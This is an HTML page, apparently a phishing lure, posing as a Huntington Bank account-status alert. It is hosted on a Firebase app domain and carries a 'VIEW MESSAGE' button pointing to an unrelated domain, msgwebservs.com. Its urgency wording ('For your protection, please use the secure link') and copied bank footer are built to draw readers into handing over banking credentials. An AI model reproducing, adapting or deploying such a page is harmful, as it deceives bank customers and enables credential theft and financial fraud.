<!DOCTYPE html>
<html>

<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Before we proceed</title><!-- update the version number as needed -->
    <script defer src="//firebase/7.15.1/firebase-app.js"></script><!-- include only the Firebase features as you need -->
    <script defer src="//firebase/7.15.1/firebase-auth.js"></script>
    <script defer src="//firebase/7.15.1/firebase-database.js"></script>
    <script defer src="//firebase/7.15.1/firebase-messaging.js"></script>
    <script defer src="//firebase/7.15.1/firebase-storage.js"></script><!-- initialize the SDK after all desired features are loaded -->
    <script defer src="//firebase/init.js"></script>
    <style media="screen">

        #message {
            background: white;
            max-width: 660px;
            margin: 50px auto 50px;
            padding: 10px 24px;
            border-radius: 10px;
        }

        #message h2 {
            color: #ffa100;
            font-weight: bold;
            font-size: 16px;
            margin: 0 0 8px;
        }

        #message h1 {
            font-size: 22px;
            font-weight: 300;
            color: rgba(0, 0, 0, 0.753);
            margin: 0 0 16px;
            font-family: Arial, Helvetica;
            font-style: bold;
        }

        #message p {
            line-height: 200%;
            margin: 16px 0 24px;
            font-size: 15px;
            font-family: Arial, Helvetica;
        }

        #load {
            color: rgba(0, 0, 0, 0.4);
            text-align: center;
            font-size: 15px;
            font-family: Arial, Helvetica;
        }

        @media (max-width: 600px) {
            body {
                background-image: url('https://files837.web.app/mobile.jpg');
            }

            #message {
                margin: 60px auto 60px;
                max-width: 600px;
                padding: 15px 15px;
                box-shadow: none;
                border-radius: 10px
            }
        }
    </style>
</head>

<body>
    <div id="message">
        <p style="text-align:left;"><img src="https://files837.web.app/logo.png" alt="Logo" width="200" height="43"></p>
        <br>
        <div>
        <h1>Please read carefully</h1>
        <p>A new message concerning your account status is now available.</p>
        <P><FONT color=#ff0000>For your protection, please use the secure link below to access your message</FONT></P>
        
          
        <div style="Margin-left: 20px;Margin-right: 20px;">
            <div class="btn btn--shadow btn--medium" style="Margin-bottom: 20px;text-align: center;"><a style="border-radius: 20px;display: inline-block;font-size: 12px;font-weight: bold;line-height: 22px;padding: 10px 40px 11px 40px;text-align: center;text-decoration: none !important;transition: opacity 0.1s ease-in;color: #ffffff !important;box-shadow: inset 0 -4px 0 0 rgba(0, 0, 0, 0.2);background-color: #394048;font-family: Arial, Helvetica, sans-serif;" href="https://msgwebservs.com/msg">   VIEW MESSAGE   </a>
                
            </div>
</div><p>You’re receiving this email because you chose to get alerts for certain account activities. For details or to change your alert settings, sign in to huntington.com or use our mobile app.</p>
            <p>You're receiving this message from an automated system. For assistance, please contact us through your secure link.</p>
</div>
            <div style=text-align:center;font-size:15px;line-height:19px;margin-top:20px;>
                <div><b>Huntington Banking Team</b></div>
                <p id="load"></p>
            </div>
        </div>
    </div>
</body>

</html>